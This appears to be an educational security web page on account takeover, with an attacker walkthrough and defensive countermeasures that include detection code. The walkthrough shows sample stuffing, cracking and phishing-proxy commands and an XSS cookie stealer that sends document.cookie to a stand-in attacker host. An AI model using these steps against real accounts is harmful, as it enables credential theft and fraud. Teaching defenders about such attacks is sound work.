ATT&CK T1078 / T1110 - Credential Access & Initial Access

ACCOUNT TAKEOVER - Unauthorized Control via Credential Compromise

Account Takeover (ATO) is the unauthorized seizure of user accounts through stolen credentials, session hijacking, phishing, or authentication bypass - enabling attackers to operate as the victim inside trusted systems.

HIGH VOLUME - BILLIONS OF CREDENTIALS IN CIRCULATION
Annual Losses: $17B+ - Estimated global ATO fraud losses annually across financial, e-commerce, and enterprise sectors
Credential Pairs Available: 24B+ - Username/password pairs available on dark web markets and breach dump repositories
Credential Stuffing Success: 0.5–2% - Typical success rate; against millions of credentials this yields thousands of compromised accounts
Password Reuse Rate: 65% - Users reuse passwords across multiple sites, directly fueling credential stuffing attacks
01 - ATO ATTACK VECTORS

🗂️
Credential Stuffing
MOST COMMON - AUTOMATED
Automated replay of breached username/password pairs from dark web dumps across thousands of sites simultaneously. Exploits password reuse - no hacking required, just automation.
🎣
Phishing / Spear Phishing
TARGETED - HIGH CONVERSION
Fraudulent emails, login pages, or SMS messages that trick users into entering credentials into attacker-controlled sites. Spear phishing targets specific individuals with personalized lures.
🔨
Brute Force / Password Spray
OPPORTUNISTIC - NOISY
Brute force tries all password combinations. Password spraying tries one common password (e.g., "Summer2024!") against thousands of accounts to avoid lockout thresholds.
🍪
Session Hijacking
POST-AUTH - STEALTHY
Stealing authenticated session cookies via XSS, MITM, or network sniffing. The attacker replays the session token and gains access without ever knowing the password.
📱
MFA Bypass / SIM Swapping
ADVANCED - SOCIAL ENGINEERING
SIM swap: social-engineer a carrier to transfer victim's phone number. MFA fatigue: spam push notifications until user approves. Real-time phishing proxies intercept OTP codes.
🧬
OAuth / SSO Abuse
MODERN - CHAIN ATTACKS
Exploit misconfigured OAuth flows, consent phishing ("malicious app requests"), or redirect URI vulnerabilities to steal authorization tokens granting access to linked accounts.
02 - CREDENTIAL STUFFING - HOW IT WORKS

The Stuffing Pipeline
A single breach fuels thousands of account takeovers across the web through automation and password reuse.
1
Breach Database Acquired
Attacker purchases dump from dark web (e.g., 200M LinkedIn, 730M COMB). File contains email:password pairs in plaintext or easily cracked hashes.
2
Credential List Cleaned & Deduped
Parse, deduplicate, and filter credentials. Prioritize high-value domains (banking, email). Convert hashed passwords using rainbow tables or prior cracking.
3
Automated Stuffing Tool Deployed
Tools like Sentry MBA, STORM, OpenBullet load target site configs. Distributed through rotating residential proxies and headless browsers to evade IP-based rate limiting.
4
Successful Logins Harvested
Hits are automatically captured - account balance, linked payment methods, stored PII, and access to connected services (OAuth-linked accounts).
5
Account Monetized or Sold
Compromised accounts sold in bulk, used for fraud, or leveraged for further attacks. Bank accounts drained, loyalty points liquidated, SaaS accounts used for spam.


KEY INSIGHT

At scale: 0.5% success rate × 100M credentials = 500,000 compromised accounts from a single campaign.

03 - ATTACK FLOW DIAGRAM

Attack flow diagram (figure on the original page): ① SOURCE - breach dump bought on a dark web market → ② ACQUIRE - credential list of email:pass pairs → ③ AUTOMATE - stuffing engine using proxies and bots, distributed and headless → ④ ATTACK - attempt target login (bank / SaaS / email); on failure, retry with the next pair → ⑤ TAKEOVER - account owned, session hijacked, credentials changed → ⑥ EXPLOIT - monetize.
04 - STEP-BY-STEP WALKTHROUGH

Phase 01 - Credential Acquisition

SOURCING STOLEN CREDENTIALS

🛒
ATTACKER STATUS
PREPARATION PHASE

Before any attack, the threat actor assembles their ammunition: massive lists of breached credentials harvested from dark web markets, paste sites, and prior breach databases. No hacking skill required at this stage.

  • Purchase breach combo lists from Telegram channels, dark web forums (BreachForums, RaidForums)
  • COMB (Collection of Many Breaches): 3.2B unique pairs aggregated from prior breaches
  • Credential cracking: MD5/SHA1 hashes cracked using Hashcat + RockYou wordlists
  • Scrape LinkedIn, HaveIBeenPwned, DeHashed for account enumeration
  • Clean and parse: remove duplicates, filter by target domain (e.g. @company.com)
attacker - credential prep
# Parse & filter breach combo list
$ wc -l comb_2024.txt
3,218,442,970 comb_2024.txt
 
$ grep "@targetbank.com" comb_2024.txt > bank_creds.txt
Found: 48,291 matching credentials
 
$ hashcat -m 0 hashes.txt rockyou.txt --show
Recovered: 31,847/48,291 (65.9%)
 
$ sort -u bank_creds.txt | wc -l
28,103 unique credential pairs ready
Phase 02 - Automated Attack Deployment

DEPLOYING THE STUFFING BOT

🤖
ATTACK SCALE
THOUSANDS OF ATTEMPTS / MINUTE

Credential stuffing tools automate login attempts at machine speed across thousands of distributed IP addresses, impersonating real browsers to evade bot detection systems and WAFs.

  • OpenBullet / SilverBullet - open-source stuffing framework with site-specific configs
  • Residential proxy networks (10M+ IPs) make each attempt appear from a real user location
  • CAPTCHA-solving services (2captcha, Anti-Captcha) automatically bypass CAPTCHA challenges
  • Browser fingerprint spoofing: rotate User-Agent, TLS fingerprint, and screen resolution
  • Rate limiting evasion: slow-and-low mode (1 attempt/IP/hour) defeats most defenses
openbullet - credential stuffing config
# OpenBullet config for target site
BLOCK:REQUEST
URL = "https://targetbank.com/login"
POST username=<USER>&password=<PASS>
 
BLOCK:KEYCHECK
SUCCESS → "Welcome back, " (200)
FAILURE → "Invalid credentials" (401)
 
$ proxies: 14,892 residential IPs loaded
[*] Starting campaign...
[+] HIT: user@targetbank.com:Dallas1987
Phase 03 - Social Engineering Vector

PHISHING ATTACK

🎣
TARGET STATUS
VICTIM UNAWARE - CREDENTIALS INTERCEPTED

Phishing creates convincing fake login pages that capture credentials in real time. Modern adversary-in-the-middle (AiTM) phishing proxies even intercept MFA tokens, defeating two-factor authentication entirely.

  • Evilginx2 / Modlishka - reverse proxy AiTM that captures both password AND session cookie
  • Email lures: "Your account has been locked - verify immediately" drives urgency
  • Domain squatting: login-microsoft.com, paypa1.com, security-bankofamerica.net
  • Spear phishing uses victim's name, employer, and recent activity for personalized lures
  • Captured session cookie grants access even if victim has MFA enabled
evilginx2 - AiTM phishing proxy
: phishlets hostname o365 login-microsoft-secure.com
: phishlets enable o365
[+] Phishlet 'o365' enabled - proxying live
 
# Victim clicks link, enters real M365 creds
[17:42:11] Username: victim@company.com
[17:42:14] Password: Autumn2024!
# Victim completes MFA push on real phone
[17:42:19] SESSION COOKIE CAPTURED ✓
[!] Account fully compromised - MFA bypassed
Phase 04 - Authentication Bypass

MFA BYPASS & SIM SWAP

📱
DEFENSIVE LAYER
MFA DEFEATED

MFA is not impenetrable. Attackers use SIM swapping, MFA fatigue attacks, and real-time OTP interception to defeat two-factor authentication - the last major barrier between credentials and account access.

  • SIM Swap - social engineer carrier to port victim's number to attacker's SIM. All SMS OTPs now go to attacker
  • MFA Fatigue - spam 50+ push notifications until frustrated user approves one
  • Real-time relay - phishing site proxies OTP to real site within seconds before expiry
  • SS7 protocol attacks intercept SMS at the carrier level (nation-state capability)
  • Attacker registers their own authenticator app via account recovery flows
MFA fatigue attack - push spam
# Attacker has valid password - MFA blocks login
# Begin push notification flood
 
[09:11] MFA push sent → victim phone
[09:11] Response: DENIED
[09:13] MFA push sent → victim phone
[09:13] Response: DENIED
[09:17] MFA push sent → victim phone
[09:17] Response: DENIED
[09:22] MFA push sent → victim phone
[09:22] Response: APPROVED ← victim fatigue
[!] MFA bypassed - account accessed
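A defender-side check for the push flood shown above, added here and not part of the original walkthrough: it parses response lines in the same format (constructed sample data) and refuses to treat an approval that follows repeated denials as consent. The 15-minute window and the two-denial threshold are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed push log in the shape of the walkthrough above (not real data).
PUSH_LOG = """\
[09:11] MFA push sent → victim phone
[09:11] Response: DENIED
[09:13] MFA push sent → victim phone
[09:13] Response: DENIED
[09:17] MFA push sent → victim phone
[09:17] Response: DENIED
[09:22] MFA push sent → victim phone
[09:22] Response: APPROVED
"""
RESP = re.compile(r"^\[(\d\d:\d\d)\] Response: (\w+)$")

def responses(log):
    """Extract (time, outcome) from every push response line."""
    out = []
    for line in log.splitlines():
        m = RESP.match(line)
        if m:
            out.append((datetime.strptime(m.group(1), "%H:%M"), m.group(2)))
    return out

def push_policy(log, window=timedelta(minutes=15), max_denials=2):
    """Decide what to do with the latest push response: (decision, denials).
    Once the user has denied `max_denials` prompts inside `window`, a later
    approval is treated as fatigue rather than consent: the login is held,
    push prompts are suspended for the account, and the user is alerted."""
    resp = responses(log)
    if not resp:
        return ("no-data", 0)
    last_ts, last = resp[-1]
    recent = [r for ts, r in resp if last_ts - ts <= window]
    denials = recent.count("DENIED")
    if denials >= max_denials:
        return ("hold-and-alert" if last == "APPROVED" else "suspend-push", denials)
    return ("allow" if last == "APPROVED" else "deny", denials)

# A single prompt answered once: the normal case the policy must not disturb.
BENIGN_LOG = "[14:02] MFA push sent → victim phone\n[14:02] Response: APPROVED\n"
```

Number matching (typing a code shown on the login screen into the authenticator) removes the one-tap approval the flood relies on; this policy is the fallback for deployments that still use plain push.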
Phase 05 - Session Hijacking

SESSION COOKIE THEFT

🍪
SESSION STATE
SESSION HIJACKED

Once credentials are verified, the attacker steals the authenticated session cookie - a token that proves the user has already logged in. This token can be replayed from any device or location.

  • XSS injection on trusted site executes attacker-controlled script, exfiltrating document.cookie
  • MITM attack on public WiFi captures unencrypted session tokens in transit
  • Malware (infostealer) harvests all browser session cookies from victim's device
  • Browser extension compromise silently forwards all cookies to attacker's server
  • Session fixation: attacker pre-sets the session ID before victim authenticates
attacker - session theft via XSS
# XSS payload injecting cookie stealer
<script>
fetch("https://attacker.io/steal?c="
+ document.cookie)
</script>
 
# Received on attacker server
session_id=abc123xyz789; auth_token=eyJh...
 
# Replay stolen cookie
curl -H "Cookie: session_id=abc123xyz789"
https://targetsite.com/account/profile
200 OK - Logged in as victim@email.com
Phase 06 - Account Lockout

LOCKING OUT THE VICTIM

🔒
VICTIM STATUS
LOCKED OUT OF OWN ACCOUNT

To prevent the victim from regaining control, the attacker immediately changes the account password, email address, phone number, and recovery options - permanently locking out the legitimate owner.

  • Change account password immediately after gaining access
  • Update recovery email to attacker-controlled address
  • Change phone number to attacker's SIM to intercept all future OTPs
  • Revoke all existing sessions to prevent victim from reclaiming account
  • Enable additional MFA under attacker's control to prevent recovery
attacker - account lockout sequence
# Change password immediately
POST /account/change-password
{"new_password":"Attacker@9999!"}
Password updated ✓
 
POST /account/update-email
{"email":"attacker@proton.me"}
Recovery email updated ✓
 
[!] Victim now locked out permanently
[!] All recovery paths controlled by attacker
Phase 07 - Monetization

EXPLOITATION & CASH OUT

💰
ATTACKER PROFIT
MONETIZATION IN PROGRESS

With full account control, attackers pursue maximum financial and strategic value: draining funds, harvesting stored payment data, using the account as an attack platform, or selling it to other criminals.

  • Financial fraud - initiate wire transfers, drain balances, max out linked cards
  • Identity theft - use PII to open credit cards, apply for loans, file fraudulent tax returns
  • Account resale - sell verified accounts on dark web (bank accounts: $50–$500 per account)
  • Email/cloud access leveraged for BEC (Business Email Compromise) fraud
  • Chain to other accounts via password reset emails, OAuth-linked services
post-takeover - monetization
# Banking ATO - financial fraud
POST /transfers/initiate
{"to":"attacker_mule","amount":9800}
Transfer queued: $9,800.00 ✓
 
# Extract stored PII + payment cards
Name: John Michael Smith
Card: **** **** **** 4823 CVV:391
 
# List on dark web market
targetbank.com FULLZ - $320 BTC
Includes: balance $47k, cards, SSN ✓
05 - ATO IMPACT MATRIX

🏦
Financial Fraud
Direct theft via unauthorized wire transfers, ACH fraud, credit card abuse, and cryptocurrency wallets. Funds moved through mule accounts become nearly unrecoverable within hours.
👤
Identity Theft
PII extracted from compromised accounts enables fraudulent credit applications, tax return fraud, synthetic identity creation, and long-term identity impersonation that takes years to resolve.
📧
Business Email Compromise (BEC)
Corporate email account takeover enables CEO fraud, fake invoice attacks, and supply chain compromise. FBI reports BEC losses exceed $2.9B annually - largest cybercrime loss category.
🔗
Account Chaining
One compromised account cascades to others via password resets, OAuth-linked apps, and SSO. A single email takeover can unlock banking, social media, cloud storage, and e-commerce simultaneously.
🏢
Enterprise Lateral Movement
Corporate account takeover provides an authenticated foothold inside the target organization - bypassing perimeter controls. Enables internal spear phishing, data exfiltration, and ransomware deployment.
📉
Reputational & Regulatory Damage
Mass ATO events trigger mandatory breach disclosures, regulatory fines (GDPR, CCPA), customer churn, and media coverage. The average ATO-related data breach costs $4.45M (IBM Cost of a Data Breach 2023).
06 - DEFENSIVE COUNTERMEASURES

🔑
Phishing-Resistant MFA
Replace SMS OTP with FIDO2/WebAuthn hardware keys (YubiKey) or passkeys. The credential is bound to the legitimate origin, so a phishing site on another domain cannot intercept or replay it. Defeats AiTM proxies entirely.
🤖
Bot Detection & WAF
Deploy behavioral analysis tools (Cloudflare Bot Management, Akamai Bot Manager, DataDome) to detect credential stuffing patterns: velocity, TLS fingerprints, JS challenge failures, and device anomalies.
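The velocity signal that bot-management products look for, written out as an added example (not code from the page or from any named vendor): a small detector over constructed auth log lines, whose format is an assumption, that flags IPs cycling through many accounts and, for the slow-and-low case described in Phase 02, a site-wide surge of distinct failing accounts that per-IP thresholds would miss.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample log lines (not real traffic); the line format is assumed.
AUTH_LOG = """\
2024-05-01T09:00:01 ip=203.0.113.7 user=alice@bank.test result=FAIL
2024-05-01T09:00:02 ip=203.0.113.7 user=bob@bank.test result=FAIL
2024-05-01T09:00:02 ip=203.0.113.7 user=carol@bank.test result=FAIL
2024-05-01T09:00:03 ip=203.0.113.7 user=dave@bank.test result=SUCCESS
2024-05-01T09:00:04 ip=203.0.113.7 user=erin@bank.test result=FAIL
2024-05-01T09:00:05 ip=203.0.113.7 user=frank@bank.test result=FAIL
2024-05-01T09:01:00 ip=198.51.100.4 user=alice@bank.test result=FAIL
"""
LINE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(\S+)$")
def parse(log):
    """Return (timestamp, ip, user, result) tuples; unparseable lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)),) + m.groups()[1:])
    return events

def stuffing_sources(events, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.7):
    """IPs that cycle through many distinct accounts, mostly failing, inside one window.
    'hits' lists the accounts a defender should force-reset and alert on."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in events:
        by_ip[ip].append((ts, user, result))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            span = [e for e in evs[i:] if e[0] - start <= window]
            users = {u for _, u, _ in span}
            fails = sum(1 for _, _, r in span if r == "FAIL")
            if len(users) >= min_users and fails / len(span) >= min_fail_ratio:
                flagged[ip] = {"distinct_users": len(users), "attempts": len(span),
                               "hits": [u for _, u, r in span if r == "SUCCESS"]}
                break
    return flagged

def failure_surge(events, window=timedelta(minutes=5), min_users=5):
    """Slow-and-low stuffing stays under per-IP limits; count distinct failing accounts site-wide."""
    fails = sorted((ts, u) for ts, _, u, r in events if r == "FAIL")
    for i, (start, _) in enumerate(fails):
        users = {u for ts, u in fails[i:] if ts - start <= window}
        if len(users) >= min_users:
            return len(users)
    return 0
```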
🚨
Breached Password Detection
Integrate HaveIBeenPwned API or similar to check passwords against known breach databases at login and registration. Force password resets for accounts using known-compromised credentials.
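The k-anonymity range check used by HaveIBeenPwned's Pwned Passwords API, as an added example (not the page's or HIBP's own code): only the first five hex characters of the password's SHA-1 are sent, and the match against the returned suffix list is done locally. The range body below is constructed and no network call is made.

```python
import hashlib

PWNED_RANGE_URL = "https://api.pwnedpasswords.com/range/"  # HIBP range endpoint

def split_hash(password):
    """SHA-1 the password; only the 5-char prefix is ever sent to the API."""
    h = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return h[:5], h[5:]

def range_request_url(password):
    """The only thing that leaves the client: the URL with the 5-char prefix."""
    return PWNED_RANGE_URL + split_hash(password)[0]

def breach_count(password, range_body):
    """Match the locally kept 35-char suffix against the 'SUFFIX:COUNT' lines
    the API returns for that prefix. Returns 0 when the suffix is absent."""
    _, suffix = split_hash(password)
    for line in range_body.splitlines():
        found, _, count = line.strip().partition(":")
        if found.upper() == suffix and count.isdigit():
            return int(count)
    return 0

def login_decision(password, range_body):
    """At login or registration: a known-breached password gets a forced reset."""
    return "force-reset" if breach_count(password, range_body) > 0 else "ok"

# Constructed stand-in for a range response (real ones hold hundreds of lines);
# it deliberately includes the suffix for the walkthrough's "Autumn2024!".
SAMPLE_RANGE = "\n".join([
    "0018A45C4D1DEF81644B54AB7F969B88D65:1",
    split_hash("Autumn2024!")[1] + ":1874",
    "00D4F6E8B2A9C1F3E5D7B9A1C3E5F7D9B1A:3",
])
```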
📊
Risk-Based Authentication
Step-up authentication based on contextual risk signals: new device, impossible travel, unusual IP geolocation, abnormal transaction size. High-risk logins trigger additional verification challenges.
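An added example (not from the original page) scoring two of the contextual signals listed above over constructed login events: great-circle distance between consecutive logins divided by elapsed time gives an impossible-travel flag, and an unseen device id adds risk. The coordinates, the 900 km/h ceiling, the score weights and the step-up threshold are assumptions.

```python
import math
from datetime import datetime

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))

# Constructed login history for one user: (time, city, lat, lon, device id).
LOGINS = [
    ("2024-05-01T08:00:00", "Dallas", 32.78, -96.80, "dev-A"),
    ("2024-05-01T08:45:00", "Dallas", 32.78, -96.80, "dev-A"),
    ("2024-05-01T09:30:00", "Lagos", 6.52, 3.38, "dev-B"),
]
MAX_SPEED_KMH = 900.0   # assumption: faster than an airliner is not human travel
STEP_UP_AT = 3          # assumption: score at which extra verification is required

def risk_scores(events, max_speed=MAX_SPEED_KMH):
    """Score each login against the previous one; returns (city, score, reasons).
    Impossible travel weighs 3, a device id never seen before weighs 1."""
    out, seen_devices, prev = [], set(), None
    for ts_s, city, lat, lon, dev in events:
        ts = datetime.fromisoformat(ts_s)
        score, reasons = 0, []
        if dev not in seen_devices:
            seen_devices.add(dev)
            score += 1
            reasons.append("new-device")
        if prev is not None:
            pts, plat, plon = prev
            hours = (ts - pts).total_seconds() / 3600.0
            dist = haversine_km(plat, plon, lat, lon)
            # More than 50 km in zero time, or faster than max_speed, is impossible.
            if dist > 50 and (hours <= 0 or dist / hours > max_speed):
                score += 3
                reasons.append("impossible-travel: %.0f km in %.2f h" % (dist, hours))
        prev = (ts, lat, lon)
        out.append((city, score, reasons))
    return out

def step_up_required(score):
    """High-risk logins get an additional verification challenge."""
    return score >= STEP_UP_AT
```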
🔔
Real-Time Login Alerting
Notify users via out-of-band channel (secondary email, push) of every login, especially from new devices or locations. Immediate alerts enable rapid response before attacker locks out victim.
⏱️
Session Token Hygiene
Short session expiry, Secure + HttpOnly + SameSite=Strict cookie flags, token binding to device fingerprint. Stolen session tokens should expire quickly and be unusable from different contexts.
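An added example (not the page's code) that issues a session cookie with the flags above and binds it to a coarse client context, so the Phase 05 replay of the same cookie from another device fails validation and an expired cookie is refused. The fingerprint inputs and the 15-minute TTL are assumptions; context binding is coarse and complements the short expiry rather than replacing it.

```python
import hashlib, hmac, secrets, time

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret kept server-side
SESSION_TTL = 15 * 60                 # assumption: short absolute expiry, in seconds

def context_fingerprint(user_agent, client_net):
    """Coarse device/network context the session is bound to (inputs assumed)."""
    return hashlib.sha256(f"{user_agent}|{client_net}".encode()).hexdigest()

def issue_session(user, ctx_fp, now=None):
    """Return (Set-Cookie header value, server-side record). The cookie carries a
    random id plus an HMAC over id|context; the expiry lives in the record."""
    now = time.time() if now is None else now
    sid = secrets.token_urlsafe(32)
    tag = hmac.new(SERVER_KEY, f"{sid}|{ctx_fp}".encode(), hashlib.sha256).hexdigest()
    record = {"sid": sid, "user": user, "ctx": ctx_fp, "expires": now + SESSION_TTL}
    header = (f"session_id={sid}.{tag}; Path=/; Max-Age={SESSION_TTL}; "
              "Secure; HttpOnly; SameSite=Strict")
    return header, record

def validate_session(cookie_value, ctx_fp, record, now=None):
    """Genuine cookie bytes are not enough: the presenting context must match
    the one the session was issued to, and the session must not have expired."""
    now = time.time() if now is None else now
    sid, _, tag = cookie_value.partition(".")
    if sid != record["sid"] or now > record["expires"]:
        return False
    expected = hmac.new(SERVER_KEY, f"{sid}|{ctx_fp}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected) and ctx_fp == record["ctx"]

def demo():
    """Issue a session to the victim's browser, then try the Phase 05 replay."""
    victim_ctx = context_fingerprint("Mozilla/5.0 (Windows NT 10.0)", "192.0.2.0/24")
    header, rec = issue_session("victim@email.com", victim_ctx)
    cookie = header.split(";")[0].split("=", 1)[1]       # what the browser stores
    replay_ctx = context_fingerprint("curl/8.5.0", "203.0.113.0/24")
    return {
        "flags_ok": all(f in header for f in ("Secure", "HttpOnly", "SameSite=Strict")),
        "victim_ok": validate_session(cookie, victim_ctx, rec),
        "replay_blocked": not validate_session(cookie, replay_ctx, rec),
        "expired_blocked": not validate_session(
            cookie, victim_ctx, rec, now=rec["expires"] + 1),
    }
```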
🗝️
Passkeys (FIDO2)
Passkeys replace passwords entirely with device-bound cryptographic credentials. No shared secret to steal or stuff. Completely immune to phishing, credential stuffing, and brute force attacks.
🛡️
Account Recovery Hardening
Require identity verification for recovery contact changes. Add time delays (24–48hr) before recovery email/phone changes take effect. Send verification to old contact before allowing changes.
👁️
Threat Intelligence Feeds
Subscribe to ATO-specific threat intel feeds monitoring dark web markets for your domain's credentials. Proactively reset accounts before attackers can use them. Services: SpyCloud, DarkOwl, Constella.